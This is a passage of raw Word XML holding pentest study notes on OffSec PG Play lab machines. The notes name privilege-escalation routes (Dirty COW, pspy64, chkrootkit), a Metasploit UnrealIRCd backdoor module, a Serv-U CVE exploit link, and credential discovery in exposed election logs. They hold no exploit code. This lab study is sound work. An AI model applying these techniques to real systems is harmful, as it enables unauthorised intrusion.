    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I've seen Dirtycow 2 being used twice so far in PG Play. Like </w:t>
      </w:r>
      <w:hyperlink r:id="rId1197">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sumo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1198">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lapiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tlcixo4cgket" w:id="517"/>
      <w:bookmarkEnd w:id="517"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antivirus scan and CHKROOTKIT </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SunsetDecoy PG Play seemed to have many different ways to get privilege escalation. In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1199">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version of the walkthrough, they used the antivirus scan capability. And then in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1200">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version of the walkthrough, they used CHKROOTKIT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But one thing they both had in common is that they both used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a tool that monitors processes running on the system without requiring root access. It shows scheduled tasks, cron jobs, and processes triggered by system activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ebugqzu58nef" w:id="518"/>
      <w:bookmarkEnd w:id="518"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Irc unreal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1201">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetNoontide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, found irc (Internet Relay Chat); IRC protocol is an application layer protocol that facilitates text-based chat system for instant messaging. IRC is designed for group communication in discussion forums ,works on client/server model</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was found on these ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6667</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6697</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IRC Unreal (Unreal is the version of IRC) is vulnerable, so we just used the Metasploit exploit "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_egb4chseuodz" w:id="519"/>
      <w:bookmarkEnd w:id="519"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Morse Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1202">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Vegeta1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we got morse code in the format of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.wav</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. You can use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1203">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to translate/decode Morse Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1204">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://morsecode.world/international/decoder/audio-decoder-adaptive.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cjf5m1ef3ld0" w:id="520"/>
      <w:bookmarkEnd w:id="520"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eLection website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information about this website can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId1205">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it's a website made by Tripath Project. And it was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1206">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this specific box, we went to Settings &gt; System Info &gt; Logging &gt; View Logs. And then in the logs section we saw credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, in another writeup, it seems there was an even easier way to obtain the logs. The website was on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/election/admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and if you did further ffuf, you would have found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/election/admin/logs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system.log </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file reveals the same info, so no need to get into the eLection GUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g97gh1egp4oi" w:id="521"/>
      <w:bookmarkEnd w:id="521"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serv-U FTP Server (CVE-2019–12181)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1207">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play exploited this via this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1208">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploitdb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003800">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1209">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/47173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801">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003802">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003803">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sd3sms3mji29" w:id="522"/>
      <w:bookmarkEnd w:id="522"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CMSMS (CMS Made Simple)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003804">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1210">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">My-CMSMS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had to exploit CMSMS. We got into the MySQL database, where we found an admin user and an MD5 hash but it was uncrackable. So we tried adding a new user, but that didn't work (you can see how we did that in the MySQL section).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003805">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003806">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
